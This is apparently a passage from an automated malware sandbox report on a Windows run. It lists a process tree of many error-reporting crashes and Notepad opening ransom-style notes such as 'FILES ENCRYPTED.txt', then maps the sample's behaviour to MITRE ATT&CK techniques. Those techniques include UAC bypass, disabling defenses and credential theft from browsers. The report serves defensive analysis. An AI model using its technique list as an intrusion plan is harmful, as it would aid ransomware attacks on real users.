C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 4412 -ip 4412
1⤵
PID:7604

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 9200 -ip 9200
1⤵
PID:5232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4412 -ip 4412
1⤵
PID:9808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 9200 -ip 9200
1⤵
PID:7368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4412 -ip 4412
1⤵
PID:7880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 9200 -ip 9200
1⤵
PID:6612

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 4412 -ip 4412
1⤵
PID:8028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 9200 -ip 9200
1⤵
PID:9988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 4412 -ip 4412
1⤵
PID:7616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 9200 -ip 9200
1⤵
PID:8752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 4412 -ip 4412
1⤵
PID:9172

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\42a69a33a8884e5ba045787d096274e3 /t 6820 /p 6668
1⤵
PID:8604

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 720 -p 9200 -ip 9200
1⤵
PID:7596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 4412 -ip 4412
1⤵
PID:9356

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 9200 -ip 9200
1⤵
PID:9752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 4412 -ip 4412
1⤵
PID:9916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 9200 -ip 9200
1⤵
PID:9208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4412 -ip 4412
1⤵
PID:6180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 9200 -ip 9200
1⤵
PID:7728

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 4412 -ip 4412
1⤵
PID:7916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4412 -ip 4412
1⤵
PID:8580

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 9200 -ip 9200
1⤵
PID:6884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 4412 -ip 4412
1⤵
PID:4636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 9200 -ip 9200
1⤵
PID:3700

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\860033a6ced64ed4af6a0ae066dd15a2 /t 1960 /p 2624
1⤵
PID:6396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4412 -ip 4412
1⤵
PID:4868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 4412 -ip 4412
1⤵
PID:11244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4412 -ip 4412
1⤵
PID:5400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 744 -p 4412 -ip 4412
1⤵
PID:3116

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4412 -ip 4412
1⤵
PID:10792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 4412 -ip 4412
1⤵
PID:7712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4412 -ip 4412
1⤵
PID:10644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4412 -ip 4412
1⤵
PID:8216

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 4412 -ip 4412
1⤵
PID:6712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4412 -ip 4412
1⤵
PID:10416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 4412 -ip 4412
1⤵
PID:8896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 4412 -ip 4412
1⤵
PID:9340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4412 -ip 4412
1⤵
PID:4524

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Desktop\mk1ah-readme.txt
1⤵
PID:9496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 4412 -ip 4412
1⤵
PID:8520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 4412 -ip 4412
1⤵
PID:10076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4412 -ip 4412
1⤵
PID:10048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 752 -p 4412 -ip 4412
1⤵
PID:3548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 752 -p 4412 -ip 4412
1⤵
PID:6308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 4412 -ip 4412
1⤵
PID:11004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 4412 -ip 4412
1⤵
PID:9196

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4412 -ip 4412
1⤵
PID:5852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 4412 -ip 4412
1⤵
PID:556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 4412 -ip 4412
1⤵
PID:7940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4412 -ip 4412
1⤵
PID:11088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4412 -ip 4412
1⤵
PID:4156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 824 -p 4412 -ip 4412
1⤵
PID:11148

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 4412 -ip 4412
1⤵
PID:5460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 4412 -ip 4412
1⤵
PID:7476

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 752 -p 4412 -ip 4412
1⤵
PID:11036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4412 -ip 4412
1⤵
PID:9248

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4412 -ip 4412
1⤵
PID:10868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 4412 -ip 4412
1⤵
PID:8088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 792 -p 4412 -ip 4412
1⤵
PID:11192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 796 -p 4412 -ip 4412
1⤵
PID:9700

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 764 -p 4412 -ip 4412
1⤵
PID:9656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 780 -p 4412 -ip 4412
1⤵
PID:2580

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 4412 -ip 4412
1⤵
PID:6084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 800 -p 4412 -ip 4412
1⤵
PID:7220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4412 -ip 4412
1⤵
PID:10104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 4412 -ip 4412
1⤵
PID:5332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 820 -p 4412 -ip 4412
1⤵
PID:8004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 808 -p 4412 -ip 4412
1⤵
PID:11076

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Drops startup file
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:9108

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:8520

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\FILES ENCRYPTED.txt
1⤵
PID:7820

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Replication Through Removable Media

T1091

Execution

Scheduled Task/Job

T1053

Scheduled Task

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Hijack Execution Flow

T1574

Executable Installer File Permissions Weakness

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Hijack Execution Flow

T1574

Executable Installer File Permissions Weakness

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Direct Volume Access

T1006

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

Hijack Execution Flow

T1574

Executable Installer File Permissions Weakness

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Safe Mode Boot

T1562.009

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Windows Credential Manager

T1555.004

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Credentials in Registry

T1552.002

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery